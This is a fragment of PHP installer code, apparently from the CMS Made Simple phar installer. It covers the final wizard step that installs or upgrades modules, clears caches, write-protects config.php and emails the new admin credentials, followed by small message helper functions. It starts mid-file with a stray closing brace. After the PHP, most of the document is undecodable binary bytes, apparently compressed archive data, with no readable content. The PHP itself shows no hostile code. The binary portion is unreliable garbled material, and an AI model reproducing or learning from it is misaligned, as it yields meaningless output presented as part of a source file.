} // end of class

?>
<?php

namespace cms_autoinstaller;
use \__appbase;

class wizard_step9 extends \cms_autoinstaller\wizard_step
{
    protected function process()
    {
        // nothing here
    }


    private function do_upgrade($version_info)
    {
        $app = \__appbase\get_app();
        $destdir = $app->get_destdir();
        $config = $app->get_config();
        
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 900));

        $this->connect_to_cmsms();

        // upgrade modules
        $this->message(\__appbase\lang('msg_upgrademodules'));
        $modops = \ModuleOperations::get_instance();
        $allmodules = $modops->FindAllModules();
        
        # we check if we have the correct version  of modops just in case
        if(! \method_exists($modops, 'IsOptionalSystemModule') )
        {
            throw new \RuntimeException(\__appbase\lang('error_internal', 903));
        }
        
        foreach($allmodules as $name)
        {
            // we force all system modules to be loaded, if it's a system module
            // and needs upgrade, then it should automagically upgrade.
            // additionally, upgrade any specific modules specified by the upgrade routine.
            // even if the module is optional we still need to load it... if not queued for install
            // it should be handled by the force load routine.
            
            if(($modops->IsSystemModule($name) && !$modops->IsOptionalSystemModule($name)) || $modops->IsQueuedForInstall($name))
            {
                self::verbose(\__appbase\lang('msg_upgrade_module', $name));
                $module = $modops->get_module_instance($name, '', TRUE);
                if(!\is_object($module))
                {
                    $this->error("FATAL ERROR: could not load module {$name} for upgrade");
                }
            }
            else if ($modops->IsOptionalSystemModule($name) && \in_array($name, $config['optional_modules']))
            {
                # now we handle optional modules.
                ## TODO add a language string here. self::verbose(\__appbase\lang('install_optional_module', $name));
                self::verbose(\__appbase\lang('install_module', $name));
                $modops->QueueForInstall($name);
                $module = $modops->get_module_instance($name, '', TRUE);
            }
        }

        // clear the cache
        \cmsms()->clear_cached_files();
        $this->message(\__appbase\lang('msg_clearedcache'));

        // write protect config.php
        @\chmod("$destdir/config.php", 0444);

        // todo: write history

        // set the finished message.
        $app = \__appbase\get_app();
        if( $app->has_custom_destdir() || !$app->in_phar() ) {
            $this->set_block_html('bottom_nav',\__appbase\lang('finished_custom_upgrade_msg'));
        }
        else {
            $url = $app->get_root_url();
            $admin_url = $url;
            if( !endswith($url,'/') ) $admin_url .= '/';
            $admin_url .= 'admin';
            $this->set_block_html('bottom_nav',\__appbase\lang('finished_upgrade_msg', $url, $admin_url));
        }
    }
    
    /**
     * @throws \Exception
     */
    public function do_install()
    {
        // create tmp directories
        $app = \__appbase\get_app();
        $config = $app->get_config();
        
        $destdir = \__appbase\get_app()->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 901));
        $this->message(\__appbase\lang('install_createtmpdirs'));
        
        if(!@\mkdir($concurrentDirectory = $destdir . '/tmp/cache', 0777, TRUE) && !\is_dir($concurrentDirectory))
        {
            throw new \RuntimeException(\sprintf('Directory "%s" was not created', $concurrentDirectory));
        }
        
        if(!@\mkdir($concurrentDirectory = $destdir . '/tmp/templates_c', 0777, TRUE) && !\is_dir($concurrentDirectory))
        {
            throw new \RuntimeException(\sprintf('Directory "%s" was not created', $concurrentDirectory));
        }

        $siteinfo = $this->get_wizard()->get_data('siteinfo');
        if( !$siteinfo ) throw new \RuntimeException(\__appbase\lang('error_internal', 902));

        // install modules
        $this->message(\__appbase\lang('install_modules'));
        $this->connect_to_cmsms();
        $modops = \cmsms()->GetModuleOperations();
        $allmodules = $modops->FindAllModules();
        
        # we check if we have the correct version  of modops just in case
        if(! \method_exists($modops, 'IsOptionalSystemModule') )
        {
            throw new \RuntimeException(\__appbase\lang('error_internal', 903));
        }
        
        foreach($allmodules as $name)
        {
            // we force all system modules to be loaded, if it's a system module
            // and needs upgrade, then it should automagically upgrade.
            if($modops->IsSystemModule($name) && !$modops->IsOptionalSystemModule($name))
            {
                # system and mandatory modules should always be loaded
                self::verbose(\__appbase\lang('install_module', $name));
                $module = $modops->get_module_instance($name, '', TRUE);
            }
            else if ($modops->IsOptionalSystemModule($name) && \in_array($name, $config['optional_modules']))
            {
                # now we handle optional modules.
                ## TODO add a language string here. self::verbose(\__appbase\lang('install_optional_module', $name));
                self::verbose(\__appbase\lang('install_module', $name));
                $module = $modops->get_module_instance($name, '', TRUE);
            }
            
            if(!\is_object($module))
            {
                $this->error("FATAL ERROR: could not load module {$name} for install");
            }
        }
        
        // write protect config.php
        @\chmod("$destdir/config.php", 0444);

        $adminacct = $this->get_wizard()->get_data('adminaccount');
        $root_url = $app->get_root_url();
        if( !endswith($root_url,'/') ) $root_url .= '/';
        $admin_url = $root_url.'admin';

        if(\is_array($adminacct) && isset($adminacct['emailaccountinfo']) && $adminacct['emailaccountinfo'] && isset($adminacct['emailaddr']) && $adminacct['emailaddr'] ) {
            try {
                $this->message(\__appbase\lang('send_admin_email'));
                $mailer = new \cms_mailer();
                $mailer->AddAddress($adminacct['emailaddr']);
                $mailer->SetSubject(\__appbase\lang('email_accountinfo_subject'));
                $body = null;
                if( $app->in_phar() ) {
                    $body = \__appbase\lang('email_accountinfo_message',
                                            $adminacct['username'],$adminacct['password'],
                                            $destdir, $root_url);
                }
                else {
                    $body = \__appbase\lang('email_accountinfo_message_exp',
                                            $adminacct['username'],$adminacct['password'],
                                            $destdir);
                }
                $body = \html_entity_decode($body, \ENT_QUOTES);
                $mailer->SetBody($body);
                $mailer->Send();
            }
            catch( \Exception $e ) {
                $this->error(\__appbase\lang('error_sendingmail').': '.$e->GetMessage());
            }

        }

        // todo: set initial preferences.

        // todo: write history

        \cmsms()->clear_cached_files();
        $this->message(\__appbase\lang('msg_clearedcache'));

        // set the finished message.
        if( !$root_url || !$app->in_phar() ) {
            // find the common part of the SCRIPT_FILENAME and the destdir
            // /var/www/phar_installer/index.php
            // /var/www/foo
            $this->set_block_html('bottom_nav',\__appbase\lang('finished_custom_install_msg'));
        }
        else {
            if( endswith($root_url,'/') ) $admin_url = $root_url.'admin';
            $this->set_block_html('bottom_nav',\__appbase\lang('finished_install_msg',$root_url,$admin_url));
        }
    }

    private function do_freshen()
    {
        // create tmp directories
        $app = \__appbase\get_app();
        $destdir = \__appbase\get_app()->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 901));
        $this->message(\__appbase\lang('install_createtmpdirs'));
        
        if(!@\mkdir($concurrentDirectory = $destdir . '/tmp/cache', 0777, TRUE) && !\is_dir($concurrentDirectory))
        {
          #throw new \RuntimeException(\sprintf('Directory "%s" was not created', $concurrentDirectory));
          $this->message(\__appbase\lang('info_directory_not_created', $concurrentDirectory));
        }
        
        if(!@\mkdir($concurrentDirectory = $destdir . '/tmp/templates_c', 0777, TRUE) && !is_dir($concurrentDirectory))
        {
          #throw new \RuntimeException(\sprintf('Directory "%s" was not created', $concurrentDirectory));
          $this->message(\__appbase\lang('info_directory_not_created', $concurrentDirectory));
        }

        // write protect config.php
        @\chmod("$destdir/config.php", 0444);

        // clear the cache
        $this->connect_to_cmsms();
        \cmsms()->clear_cached_files();
        $this->message(\__appbase\lang('msg_clearedcache'));

        // todo: write history

        // set the finished message.
        if( $app->has_custom_destdir() ) {
            $this->set_block_html('bottom_nav',\__appbase\lang('finished_custom_freshen_msg'));
        }
        else {
            $url = $app->get_root_url();
            $admin_url = $url;
            if( !endswith($url,'/') ) $admin_url .= '/';
            $admin_url .= 'admin';
            $this->set_block_html('bottom_nav',\__appbase\lang('finished_freshen_msg', $url, $admin_url ));
        }
    }

    private function connect_to_cmsms()
    {
        // this loads the standard CMSMS stuff, except smarty cuz it's already done.
        // we do this here because both upgrade and install stuff needs it.
        global $CMS_INSTALL_PAGE, $DONT_LOAD_SMARTY, $CMS_VERSION, $CMS_PHAR_INSTALLER;
        $CMS_INSTALL_PAGE = 1;
        $CMS_PHAR_INSTALLER = 1;
        $DONT_LOAD_SMARTY = 1;
        $CMS_VERSION = $this->get_wizard()->get_data('destversion');
        $app = \__appbase\get_app();
        $destdir = $app->get_destdir();
        if( \is_file("$destdir/lib/include.php") ) {
            include_once($destdir.'/lib/include.php');
        }
        else {
            // do not need to test /include.php as if it still exists, it is bad...
            // and it should have been deleted by now.
            throw new \RuntimeException("Could not find $destdir/lib/include.php");
        }
        
        $config = \cms_config::get_instance();

        // we do this here, because the config.php class may not set the define when in an installer.
        if( !\defined('CMS_DB_PREFIX')) \define('CMS_DB_PREFIX', $config['db_prefix']);
    }
    
    /**
     * @throws \SmartyException
     */
    protected function display()
    {
        $app = \__appbase\get_app();
        $smarty = \__appbase\smarty();

        // display the template right off the bat.
        parent::display();
        $smarty->assign('back_url',$this->get_wizard()->prev_url());
        $smarty->display('wizard_step9.tpl');
        $destdir = $app->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 903));


        // here, we do either the upgrade, or the install stuff.
        try {
            $action = $this->get_wizard()->get_data('action');
            $tmp = $this->get_wizard()->get_data('version_info');
            if('upgrade' == $action && \is_array($tmp) && \count($tmp) ) {
                $this->do_upgrade($tmp);
            }
            else if('freshen' == $action) {
                $this->do_freshen();
            }
            else if('install' == $action) {
                $this->do_install();
            }
            else {
                throw new \RuntimeException(\__appbase\lang('error_internal', 910));
            }

            // clear the session.
            $sess = \__appbase\session::get();
            $sess::clear();

            $this->finish();
        }
        catch( \Exception $e ) {
            $this->error($e->GetMessage());
        }

        $app->cleanup();
    }

} // end of class

?>
<?php

function ilang() : string
{
  $args = func_get_args();
  
  return \__appbase\langtools::get_instance()->translate($args);
}

function verbose_msg($str)
{
  $obj = \__appbase\wizard::get_instance()->get_step();
  
  if(method_exists($obj, 'verbose'))
  {
    return $obj->verbose($str);
  }
}

function status_msg($str)
{
  $obj = \__appbase\wizard::get_instance()->get_step();
  
  if(method_exists($obj, 'message'))
  {
    return $obj->message($str);
  }
}

function error_msg($str)
{
  $obj = \__appbase\wizard::get_instance()->get_step();
  
  if(method_exists($obj, 'error'))
  {
    return $obj->error($str);
  }
}
?>�
�[9�8~�����x�i{�LB2�I�L��	d�v�����@Ol����v����z�{�mH�{g�ބ�J%�$�J�RU�����y�zI��ۗ�m����t�=���o���{��߻�y��?�w��"��~Ӽ�'P�ר������x���bp)�iw��Ž�tt&�S�.�"�0駱(.�I.N'�P�8}�$��i�9�:9Osq�l/��'��l2�G�D�y>ł�D\$�<-�8����(+D�<�%Pg��UwZ0��$���
ѝdy2э��L��Cٮn�	�q?.�~k{y�b=?����>|z�<�O��ì�I>��I��z��+G��a�H?&������
���<O�~2��~�ѧȓB<��&돲Q1��6���EM��:���ʋl�'٧�u�N<H�
��ģ)X�Q���g�X�����Eǟp#�Y�aO>����[�cs�?��{�oo���\����{x���.�:��f,��x�@z����ܼ'���$��Ƣ~�����|~�%E@��’�t"γa2�a)�Ŏ8/�������E�7̇�='�lr���3`��M�!0	X�I"r`�$����<r�N�$���@���`zz	h i:��Q�'�H&��}�ǯ/ވ_�Q2��մ�N<K{��S5cJ~��",�[p,[ �d�7.�l�+��'�#t�Ŗ�B�k�l�T�v����X�ALtkZ�l��nz��X�y6N�M��v�?����䟟����͉8|����ׯ_��e`��r�?&${
��S�U�Kh; x~��oP��Ϟ��: �<=yqt|,��|-ū��'O�yv�Z�z���㣖�	6
g�����I��;���5��X�$�%�ba�l|9�G<Ȁ�c��pW����4���Qd�4�P�gS<�ZM��3Ln���� � O��ݻ�M�K� �
���n���w7���p�iGxT���?h�-(��ނb�����f��Ъ�6�"���w�߭����>~��E���G{�]L�-6�N�V��jm���`�i?�j
[�Nɧb/:�Z���ћ�G����΋��G�h/j�A���ӗ/�"̛�ם�<��{���އ� ;KG���%�	۞���� ��@�:��IQ_�D8y[���FC0 �	<��I<�S<�&eP�rQ�2%CU!�`��2�����߭� ���V�k��5X9Ѳ%	����NF��u�\ڇV�%E�?�UUZ��dX�m���4��L*���5ѐP�9�=`��z4�N�d�?��2����e��A� 2��u�ƃ<��+�O_�k%�~~�P|�e
��K���G���n	y]�´��_��Iŗ >�J� ��u����B(8/w}_�E���ɳ
��g��v��t��5����h�X��+�K�.r�q+fέXce��dž>S`�|�aa��� H�!9	�����,����P�v%�g"z�O?�� ��n��y6N�9��K��}�9�W+z�1��8��]n�>�ꣵ0�����y:�.(s�DA�[�>L^v2���g, �#k)Y��DA1�/�3p���{8��j�+�:���u����t4�D{���OF51���e!�fhRM|D~�V0k�ސ�o��&�;�S@/`�Le9���
�^BI���L��9�Ɵ��8߫mmo{G��]�m����
z�ۊ���?�7�2씬N `L����F�|�;�K�5kV�;��	nIzry��iw��N3�9�]��B)M�r��>]Y�ϭ"@��މ��4�/����9�fY�0GfW���%��6ɦ�/p���y���������~���<���_3Яt����o����ƀ��<�S.��O<��
�1��MRZK�x-�n%��pKpM1+��D[Vr�;�S>��~�ӿ�7�hs!�*��#�*�p!���a�i��0=�6@w�LSD��r�_���:raݸ����WBᯘ\ڟ���=E
X��������tDJ��q}�%4$���	��R
���5-����W�Z�GLx���j0wB�󫺌�rB������w��T�C1���g�s��G��y����ԅW�(�Vp����LOߋ���4Hk.��;
����Q�T\�'0����9��1ol<P���#If����\�x�O��E������
;x�;-���#�/VS@.Z�pe���E�.�i2��D4�Ud�@��AJZҖ=�u
��7P߂�J�$�X@t�_�t�Y��wM�;Kd�Cr��2�-2O�����V�h�j��Hmi1!GYe�h�vN
�Z+h�t`5Bp͕�*�d�Y3�fk��l!+�S,���k���
S���B�XB@/�9���,�U��n2@)s��w��K5�NA*!*"�2e�ժ��o�!)���""���^6o�w[�)��ʽ�uI*8I>-X���f�*V�/E)�����A{�X��>�$��7�JV�4o��jH]� np�\I���V�w�k������Tu�Q��1P���3�ޚ�j(�Y)K������@�?<|��<����VI���^�}��R���-����S��?�v�5{���RM���تܙ�£p�0��I=z�!��d��C�w�\�`����S<Iр8���7XeEGd�p�ڃH�*�*-�an�f�
J���X����B�����qWj̠�g�	7D��*Ϥ�`���!HϪEh=bD�ܝ�O�w���)By2���&��X�Ɔ@=������ij�Tv��*sG�vԻ�&�jt
�Q�]W(�G��	{&B���U�+ԧ�$/H�W�V
Q�B!���[B� *��
m2:s��"n$�N��%�Y.��I�����6�!"�����F5�M��	�*�#)�z��l�e@�Vm�ĩ����P�bri�W��e��L#qsg�����	h�R�(�2���ƢO���G
8b{%�[�Pgj�e
u�5��|3C�G)��F�M��ڞ��x��u��C�m��m��?���\��]�#���Qk
jt��Xrz��h���u��Q�˯@KU�<Z�F݁}�a�Na'�3�u�(�$�r�	A#1LhL dS�n�?��;�C�; ��D��c�eС/��9Dg廙|wE��E��rc�T<J.xQѥJau�2EA����_�xZ��\�an�ʐ�V��3loo�>������n�ël�?N�Wr����k��'$��TC�t�ÿR���tS,;`f[�78�h����.��r�7a9��uc;�+�&�v��)�qg�����7Ibz6GK���&��q�gC�����$%Qc_l�D(���6����lE<t�TI�e�~�T�F� T�
zp
,TB������w.$ ��>��}��e��5h5[�>4O���*'{I�m��P���(�F^6�		s.@vSXN��ҍPok��e�^\�-�U�u2���j�|��1$:<]+8�ѕ�	~�+jgώLJ�7n��D`q�"7�U0�b�J%|��+�+�I�H�H�Fb������O��%=}q|�D<}q�R�����wi�Ou�]�<���#�&7(�7ğ��9:���A���a�a9�����IG<(��X�C"}(ڍ�$�'�Ӥ�Z����)�M8F2m��W�T̀вpnp���)�K}�ц��86(w�9OY%�hA�
}V���jԃ ���O]�ڸ�"�E(e�1�8�ǃ�R|L��9'U�&J�#c�aui�	����;��
G��#c.QS�{�X�(�N�T[��ʙ~J���
SI�#�I���18M�c�d,�]o��?�b�r)j����rܺS،�����=�'���̡���������ZFZˁ5� �R�l
���k��CZ"0�[�D�8_f7�����N�!}Fl
G���c�
���P}�@p�Ug
�T��Ք'� HI5�!��T�R,5m�Rxx)�c)E(Y�r)�Pit�@����@����@�^wu��f��Kfu����M�<��|P~�q�����
����wy�{������}�xk����.]�^��y�&@7<��O�#��$�`n�<�Y�g��}�'�;��ODnۉD�A�|ۏ����/+�����%�by:�0q�v2ʖU��rx�g̕�t؅U�&H$8��(�G��~��|9�=;zt"�h�m�����E��%[55�5o�{{�IYkZG���s/剳/����(�"s$�kzS֙���Z�ǣAO���eg�aA]�z�w|&��|�5}�<9�O>% ;�V¢d��+W�.Re;��D�\��E��+s.K�@���H� E����R�3��3|�Qח����UTC�[9{4^��7Gx�)�QPuK��"yu]{�B�e�S\�[۸4G�Gs)����6C6vM���z�	��\�rX &m{t�t���p�e�����B߆�Gx��r�,G;;���K���#����i]K���)@4�u����8L� ��߇���Q��Oc�9�J�f����xp�U���hP�!G����{=��J��]��Bl��Ɓ�6�t�;(9
��n_�5��0E'	��(�M��5�ip�����F	
W�j��"�O�k8y��HͪQv�n�y�����M$��?2W�J\Y7I�E���	�	���z���<C>*�O߀����`{k
.c��;����yϞ��Qw��T\D-H�b�n�"��X]ޭNj�	�=�ph�&Y�����G0((�g}��A�,��,"g�����k��_��U���G�ܳ�d�=��]���}g��\��
�r�
<Ni�(�w)'����t,`��l��u�nhaSG-�s��	�_���V�;�!l��7�D�gGI<��"����-K�)n miD4���(���I|Dc�kG�i�:�$'���c3.Bl!�a����m�A�O���ޏ�K���W�,d�8���]2,�=ӛ'I�;�]��7#��!��hN��UG���́YѪ�ÿ�`y� �%�{�a�!�u���R�n{{��Dю�ިFdAΫ�Aծ������,i�>d�y�j��a������z���ѓdl�H�r�@&}��
/�t�$5͂�:�	�pd�t�S��Ƀ���1��!�������b[��%U�fW�4��C8���d��-��0~��c५���ZJ{FZ9��
Б��b{f�oR��'��&A/Eo
"Ũ�Y��k��}q�\�i��-MJ��B���R��nÇiEP�Bk�\���g"��?��>�QH�c�.�I�Xd���S[�
�m�e(���\������)�c��E�Of�}�$�!��[��|���d���Uwi�u�#�ݭ���y6)�9e<�l�MG�f��U�-I��@WuӥpEe�%֥�� }����|:��|���Q��_�Mlɠu��j�Z��9��1<�5[r�XX�5	�nX��l,H���=���R]���_�L­B�=�o�����C4�o��}�(%����'��M��@%�0�'���2�J�akJ@�i`+�-�W,��; �xi;5~,[+�����W�`���r�U^�����%��:�jx޾�Â��qMAÚSVό�t!�&��ʃ���'�)�*�(q�j�����F
=\ٵf�����4b�N����R$�"qY%}C�������D�C8_��$4�r�t�x*���m55�h�c�R�sY��6�(꽼��4� �w܂����J��<�πQ

��eJ7)Q3x�,l_�@u��,�g"U�y�Yh����z��F?i��{���I���w����_���?���v�_Cǣl|9I��Q�5�4߾����.���n2���xp6�l��{ɰc�¢D��D��!j�y���&�ϲ+��?�aUr;F%�`S��II���4(��'�r�ڔ�Ф�z%�`Pr#{�[4'��#c�!�pJG0��P�lJ~��	����l��͝�w�Wa��X[
��,brC#�Ur���n�+'L}���j�j��q�w�A'�܉��n,`�h�}�09o��v��F*����!���.[N�����|�F�9L �����&�B�cNjT�Ld�AY������A�C�{I�׭�ȶ,��׭��$�?�|�c������(�w�&��
1K�W������j��Bu����6LI������	^*f��:*I5�w}�7*�q�����촮48���>D���@m�o�j�����h�6�5���DY��>.�b���q2�*��&�$G�)�P����O�߃�c�}˟%������������]_�ko�[��?)��5i�۾��Ŀ�Rj[JmK��KKm�Rla獧.���$�GK9�A���;�jwu�|��°Lz��);��M$�GSV�v8��VA~d���	�ۥs��)eY��e�*0��j�V��`�w��A�:w6r�FN��[���K��o �ZfU`�-I������}�:`ڪ���Қ�2)!���1����h�0�.����(��Q�p�ZG���#�<�T�ms?pJ�2tP�*a�Rt��죱¦��u3Tv.j�x%<[l�Wd���Zq*R1LR��A=r��H7���@�N���B���9�{�'ل�P��3�e�&�4t;tf��+��w0�>�n��3�b��Q�Ј�r�q�7�;PF�B�FA�e}6@���d��p��as�pS���(��;ͺD��G��>�C���L1eKV*�s��V���r9�T�B���'F���	����F�
��p��|��X0��ӱ���ʧ}}4
�''Ug{��a2�v��O��-j=�4?b��y�e+����f��9�o�9L
;���r�������O.�{��4qA:�,+B�i~nG7�%%}�@��y���:J���&��4��TEK)N�49Bi��[����`��IN�"��1��d�bEѦ03�K���(⯥�͈�a������W	S�2@��Zv�6�1�Q9K߾�.R�r��S�����lCS����͵nUOٮ�To�>�����=�s�C��K��j��);#󬒦#RQe�kh�ܙ��]
���7#�ْ�/�1�|v�)�J�4l��҉'�b�1����f�_��[&}�K�b<�*��T
($)�ΠU�0ׂ�PU��!z����D����0cm�s�.V�t���#�6�pY��Uk�}K�J2������|4�� I�9�j����V-C���}hz�-A-���T�
l���.d�^�;�C�&(~��79z�|��>��\=�+Q�%}�����g��b��In,�|YQ�J�3t�b��
1��$��Y\��9̷�E�,?t���yL�[o[��L���.�a�E���ˇ
��|Hg9G:R�y�%�K�l�ؑ���=ɘ1���dλ��� �Ex+��Y��{��/}x�<��|���UUӲSkc���ytPGVo+146N/wfTO1���r1��30�f,�@_��מk�*��
tpc��#��V�#+���٘��5{��ϭyWub���m��9{�ݽk��N���z ��]�w���n�l�z1k��9�+�Vn��X�O����}��*���,T+�h���mL�N����3 R@���)��t&-�N�S��$>
�L��J���K���8c�_�dT��<[*�M���4d���3�9�ZS�V�U�t�м�.�
���2 �����X����P`>�1���iRґ:��խ�n�jC3Y����`xUa�Z��#�X`�z�/F�YL>�)fYY�M�Yˌ�}�<�Z�k4>�cP��˧���if�����Gd���Mr�Xu.���Wgs����Y2u-�5칹���)�H���s�E3�)ז�,�iz�b�'�I���hQ5�b��%��h�T 6�J�TJ, IeA�f*����:W��?��#�w,Ue���������6�?#��gt��☯��ЭCI�Pp}���4��	b`7�9l+'���܎h�ϸ��F��š��#mg8ǰPo
!<��f]�>�D9��E{�,DM�v	$�k!.�`�>��Taɧ�E+Q��ec���t$�V)��&��0�a#�vY�}� ��M;���d��$��4/��$�"i
��N��=`�I�>f OҏP8R�V}�'䥃^5��Rc�ߩ��;#��$��*�=,Y>~k����?��<����9�������Z�~����x]�{.�=���t\G���(�I'�Fc�	�N��,�D/^�ߎ���F�:z���ӣǞ�)9���Д�U�y1�{�"M�4=���=!��_�5�N��; 첣;��4��Mn"X�'���4(A��-�$�"�Y�a���=��R�w�{�h�?I�v���a
o:T�i��z�
��Y��7���{�e��w�����W�-�,��@���9O#o�Y�����ȝ�]m�vz�&lhbZ�	��t4�Q3�k�'�,�_��O�q�^��o|�Ϟ�>F�#�I�OXM�}����Z�Oʙ5X��o��JЩ�G~�P��
)g:��_���%�@3M�*�hE���<���=�3Xq��4AQ�Vbf9	5Qp�Px�i��bv�#y���\��x�
2�Td摸��A
.�-1�w���m���qni켷��#�E��a�sxX,�>�`��W��!�<ru��?�[H��&J{��ӢX�`}3Q������6��E�x�Z�8�1����Ƣ<K��N��w�u��y�܌���R�:�q^�3ҩ�l�&q��]�4,|j�-���A
�r`:@i0�3D�>���/}Y��X�m(���F�������kM>_��i�A���3
|�g�:���x��g�~�t�*�Nx�� ��:���GZH��4�}�����
�c�. ��_,A1qS؇� t��l\#��&
�������0�DR\�>Foj��)���A�HH6�+S��@�j��&�w�>�Y M{�j�!�gIg^�0���š>�5�A�,y��^dX,x��{BU�$Ǹ��)β6n
W��l�S�v�9-R��,*��7;|Ǟ|����~�J��Ɔ�I�fx�"�"�n�_�;8!NQ��h��D�U�7��3�`���M��F�t���	���\ �sa:k���pgo��
Y;��%���uU�&�s5�V[Y����(��sGW��I�����$(��l�	3*�$�]nM_'�L������5�I��>?����ڳ8/���r��Q#ڞ
�^{�}�\�E�����5r���.�G�:�'P7��üf��zZ�m�@Ty�]k
���n�U��.�����[����w*����V��s������[�,��_᷌�������y�A��@��@��ln�l���C�~�����8}���Ú����
O�U`W:��cJ����ﲣ�iw��G[7K�0N�D��e3��8n,����14���RԬ����&����A��IԍITUt����1��t0R?�'�
y�,GIR�����w��g/P�`�Ad$ú*����OG�D��6?yR}��0H+N�ޣ��s/xRe����n�@���x�f^E>�@^��"������FM�ΩvV������:�T<��/i�!c�\�x:`����?�4V��.:X����\F�����	��"1p?x�20+�	hfϙ���OT���;�s��?L�%BM1�"��q�LO�v���q4W9x���{|�����ӝ�/>���e�z��Mt[�xl�U ���"�E.�S�[5M���f�}W��1���
rͫ�^�H3����8�M�q���!�B�I�s���?
�Y�A"��,��:cS��s&4��# R���fZ��z��aШMw*8A���c"Ѣ�r��W a��Wx�W��,� ݱ����9|���'��NO�,���
&Z$����4�1Y�ɚ��B�5�k~�t�!�'�͢���
d(MK�8�X���;(`U$K���9��̦�n��T7����N��'/�u	�4��Z�T�mJ}wG*K�j�>�O�����A����
�o����jh���!���_�[�RH2��p�g9��զg52��D�Uι��W8:�a�厝^$����T��[���'5�,��Q�rS9�o�?����{o��ύ�w��!7�gXO�9��:_32��`Y���;����P��Z�ՍtjU��T5���^}��'%��烲BQ�:�(�cd�wxj8	�zQ���Ӗ^��'J$�YKsɤ��WbU���gGON��|���E8�az&^�0�C��J����&!��ڤL(`MO{�V�nG��Ys��Y�[E�T��(px�Ydׅ_�'�H0Ex��k�����AAiy��uLyG�,�j��T�U���Z�'EE������䓯K�0���(�6�,�*��M��_��"f=M�9&Y�l�RgF�vPn4�j�lG���
8D6K0�'	�7�kD�R'�Z�ϊ�U�M���2�C�pa�-J��yIx�Q�l��̿͌@�q�g;,\Q��#�n?*���j���G�i9�5��'��YI�B�r��s����a���O���tP��^�Sk��,F�O�j�ب��9U!T$k�QK��K7ZQMЕ#%l8�iQd��JY�3�RV
�5ʢsj�����Eɍ��L�Z]UjPR.z�O?�U�$NG�f��;Wnښ���"�Q�5*���@�� h�N6lZ�R�,��]�W��Cu�-���cs{�~)����ϯ�[�-���y���h�z���?~^��Z���;��t�g�������oڪ/��M�g_���q.����b�_�qMݮ]��M�|N�1%�IH����-���v��}e͸eƆT6NB�����ךD��9�(��E�:���3�R�k%�v�$��)�ըz�HUU�9r�AL(��DX=�m
i;�~�՝�*��"��<~�X�i�իr�Z��u&�m=p6B��)�id�0��M6 x.R���U��s;E��?e�>+��"ԫ�O_��}����_3�MS�44�^�$y���@�9%
|i��n����9
L�ؓۊ�^*ϜUYReR��:s~��r��M��S�
NB���)R�.��t gi:Q�h;-4s��^ݖ�ӣQu��4)���B��3�JT��Jrά���C��t��v>��z4c�py�8J	ש�a)�?im����-�8�P�ٵ�J��Z:R�e5�ed���6��=>��xD��8<�󄃞0S�W���1w��}aZf�ƴ�*�̂<5ќK�0���1�{�N%p�f;�8�nݦ��<�tk� ����F׃膶�c9W�D_��>�vC�!H�w��B`�`~ԛ�ۋ+W�f_.j޺�;��fm���ۗ�c��P�cۊ}0 r�*oA;0�xc.�J��&bӤ
V�� )\0io%Y�dgZ����ki6�&f�Eº&95́G�r�"�wO�ar\�(��h]�|���s諛:��	�:��G��-�����e�V2���[M�7����5eLȶ"'۟-Q2[���Γ�ώ:�֚��!h���^d� ����W�u�pzta��O���إ��2�7ʽ
��奬�ɒvNJE��kr݆��{|��� �����fz/�
�B��ȶ��Js9�g�ga��G-�Zi+jD�FT('f�S���ǮR�4��܈qױ�+Y��+-�Ƴ-�c��ؤ����g2��>7�1��Cr����[��V���1�5=}\/)����ɓ�����<s<�P����`�0��-]
q��.�kOO��k�f�3��N����~��v��@\�W�s�̺�Y�_Ǯnq+7k#�,37O�b)\Y����H��5�)
��m�}�p}�U�f;ױ�Zغ�
u��Re����)�y���yx툔���ʸ��胖C[sL���c�`5-�y+�U��|C�$��u����$ɜ�m�d��$e���>���6���9��߻[��~��5~K��������?9�٤��wh�so�}]�<Xoo�o��w�~������Sm�c��<=yv�G�2/�afNz*אF6I�:�(�'��R��[���i�I���&��_����Q��j�� !��3�8~.��0�$�|�䃀Յ�8ρ�y�I�M�tj������+8�&?��V�ؙa���K�>��G	9��rx|5!=�ТlSl��a�i�������*
�B�����=V�t�>U|��҄��;刽�5��̛���X��Ո]\��[YGWI����;������8~<����?���v��o#ԺWa��p̞KG�z�c<ږ�XwCIt��j�/P�r�:���r}����dx�J��s�UP�V)�c�h�' 8��6�A��%o�)�9 ���!��|�⋩t..Ƴ�Ǥa�� i4�����r�޷jľ�^K˱5�D
��'�t�D���O�����	��M�P�)�sd��ip�:�AAYx�f��2r�&#��9%gߧ�Z�H��Q�k���Y9yؾ���}��;s���2�w��DCg9����5��8��d�P���ByP��&�y5cڙCm�!��4�8�Sκ�B��X���HAw�&�~n#Q!H����;;��j�8$�N��t��M��<|�S�X�����6��-���$����7k�&�D�ϟf��*��v��NG�6��U����%�a��US�Z�Y�|Á)wN���k*L�6^-��Xk����+�]:5<��_�f+ר���[�T�x~��Z(�D�+��I Y�lM��� ��IU�06ܹ`�ʋ8{@���bx�i�U�6,�E"�`
z�b�y�,�7'�S���U����!��磌����#K�01'��RQJ�m�#]�ZЁ�W�B6�|<�uZ���/��ך�R��M��%G
��6�gU`������5��W����VJC�(�ȭ=Q�+�ޛ���ZR�7�X��z�yU�*hۊv̅�_F�C5í�eZ/�o�m�^�&ފD�4Y����(K��@D7G��ń������Eb�d���$–!���#JR��V���,ɒ�':({��o�Z��Q$���G:^��}����[��ݻV7�@��%�?��G/��H��[.�'x���j/���Ep�6M4Ҿ��9О)���N��c��઺�gc1���zW���q�#�PZ�	�XH_�J��6��#�\�EM\-�^��w�z7�9g��Q}d�o��T��3�0�v�M"
��v@�K��ƼyG<��9�ģ�4����h۽c��\��ƛ�����E-�3ή ��W[�j��z��V���$���MG�䲢�ϒ�Yq�#"��96�6�9u��1��
c�p%�*�q	�_/��/|qq8����{TsvQ�:�>&}�`Ż/u���@ZxR:FLJq�,47��ɥ��Nl���TN&m\��b���f�d����۾�g��M4v@�vdf�d5�H"b2�W�3ǫ�oO�&04bOss��Mz��dñ:���gi~��$��o����%ڞX�5����l�+��J�=*�S�m@�=��,�h1]u��mы����$���*ֹ��4F}����L�Ќ7Ю���k�A��@�%O�o���
